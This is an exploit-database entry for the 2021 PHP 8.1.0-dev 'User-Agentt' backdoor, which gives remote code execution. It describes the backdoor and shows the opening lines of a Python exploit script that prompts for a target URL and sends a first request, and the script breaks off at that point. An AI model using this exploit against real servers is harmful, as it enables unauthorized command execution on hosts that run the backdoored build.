Exploits / Vulnerability Discovered : 2021-06-03 |
Type : webapps |
Platform : php
This exploit / vulnerability Php 8.1.0dev useragentt remote code execution is for educational purposes only and if it is used you will do on your own risk!
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
"""
#!/usr/bin/env python3
import os
import re
import requests
host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)